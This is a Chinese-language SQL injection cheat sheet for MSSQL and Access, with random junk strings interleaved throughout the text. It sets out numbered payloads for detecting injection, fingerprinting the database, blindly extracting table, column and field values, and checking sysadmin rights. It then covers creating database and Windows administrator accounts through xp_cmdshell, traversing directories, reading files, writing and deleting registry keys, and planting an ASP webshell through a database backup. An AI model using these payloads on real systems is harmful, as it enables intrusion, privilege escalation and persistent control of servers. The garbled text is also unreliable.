1.判断是否有注入;and 1=1 ;and 1=2 'QIqBU'~
2.初步判断是否是mssql ;and user>0 ,(4K4pN
]:f%l
mEy
3.注入参数是字符'and [查询条件] and ''=' \L\b $4$d
0RK!/:'
4.搜索时没过滤参数的'and [查询条件] and '%25'=' LK"69Qx?5q
* 4Izy14e
5.判断数据库系统 yZ`wfj$Jj
Y<rU#Z #T
;and (select count(*) from sysobjects)>0 mssql Uwi7)
T#)P`q
;and (select count(*) from msysobjects)>0 access A9JdU&
]tDDq=+v
~,~eoW7
k'"%.7$U!
6.猜数据库 ;and (select Count(*) from [数据库名])>0 @R
6@]Dm
+{UcspqM
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 x;')9/3
qv*^fiT
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 e]tDy0@
h@h! ,;
9.(1)猜字段的ascii值(access) 2Gdd*=4z
m_l[MG\
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 A4ygW:
P2*<GjV`S/
(2)猜字段的ascii值(mssql) "T"h)L<
##o#eZq:"
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ow#1="G,=
42{:G8
10.测试权限结构(mssql) +U.I( 83F
7!$^r$t
-tNUMi'
!YJs]_Wr
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- T n}s*<=V
|&[EZ+[
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 6 _ow%Rx~F
=>dGL|
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- pBPl6%C.X-
!3v1bGk
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 2"S}bfrX
xjUtl
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- N&V`K0FU
O<e{
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- e*n@j
'Qo*y%{@5
;and 1=(select IS_MEMBER('db_owner'));-- L~>i,
Y5d \d\e/
LraWcO\or'
0C*7K?/
11.添加mssql和系统的帐户
EU/8=JA1
kM@zyDn,
;exec master.dbo.sp_addlogin username;-- 4NIRmDEd
;exec master.dbo.sp_password null,username,password;-- S@ f9c
{vO9ptR;
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- RAK-UN
Zr,VR-kW+
;exec master.dbo.xp_cmdshell 'net user username password +&"zU GTIc
}-3mPy(*%
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Uv~QUL3>
c{LO6dNg\z
;exec master.dbo.xp_cmdshell 'net user username password /add';-- |B2+{@R
:U(A;U1,
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ;]jNk'oa
K}U-w:{
WSY}d
Vr
Zoc0!84<z
12.(1)遍历目录
EUgs6[w 4
!7&5` q7
;create table dirs(paths varchar(100), id int)
0nD/;\OU
tlt*fH$.
;insert dirs exec master.dbo.xp_dirtree 'c:\' 13=.H5
^w06<m
;and (select top 1 paths from dirs)>0 :<#nTh_@\'
@{pLk4E
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) :$9tF>
FjI`uP
1~QPG\cdIX
u4|$bbig
(2)遍历目录 y<bDTeoo
A$xF$l
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- (/*]?Ehd
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 % -e 82J1
~**.|%Kc
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 '-/xyAzS
-8rjgB~."/
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 xpx\=iAe
A6iq[b]
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Nl(3Xqov
K>l~SDcZ3
QS]1daMIK<
*GN#
r11d
13.mssql中的存储过程 Clb@$,
om-omo&,X=
xp_regenumvalues 注册表根键, 子键 H&}pkrH~
ZEO,]$Yi7
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 0tB0@Wj
y%bF&
xp_regread 根键,子键,键值名 h.s+)fl\
Vr1<^Ib
;exec xp_regread e2W".+B1
^4Ah_U
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 9Ly]DZ;L
qH 6>!=00
xp_regwrite 根键,子键, 值名, 值类型, 值 L4|`;WP
\<6CZ
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 usL*
x9i
f[^Aw(o
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 84 pFc;<
=+MPFhvg!
xp_regdeletevalue 根键,子键,值名 -n<pPau2
Y~E`9
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 3%;a)c;D
;H.^i|_/
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 JNUt$h
zeC
RK+-
u4%Pca9(=
6ez<g
Uf
14.mssql的backup创建webshell M$8^91%4B
t=O8f5Pf{
use model KC#q@InK
9lH?-~9
create table cmd(str image); a1y-3z
} c}_<#I
insert into cmd(str) values (''); 5K?IDt7A]
*6F[t.Or
backup database model to disk='c:\l.asp'; s1=G;
&<U0ZvrsH
`&sH-d4v
E5lBdM>2
15.mssql内置函数 /U)D5ot<
- kwXvYu\
;and (select @@version)>0 获得Windows的版本号 _ T):G6C8
f|lU6EkU
;and user_name()='dbo' 判断当前系统的连接用户是不是sa i`$*Ty"x
q Xe8Kto
;and (select user_name())>0 爆当前系统的连接用户 tX %5BTv
>!1.
;and (select db_name())>0 得到当前连接的数据库 RnI&8
xJ)n4)
z(^]J`+\
.:QLk&a,:,
16.简洁的webshell aL&7 1^R,
,1CIBFY
use model !XCm>]R
krvp&+uX
create table cmd(str image); I \[_9
|! E)GahM
insert into cmd(str) values (''); }YNR"X9*)/
4 bH^":i(
backup database model to disk='g:\wwwtest\l.asp';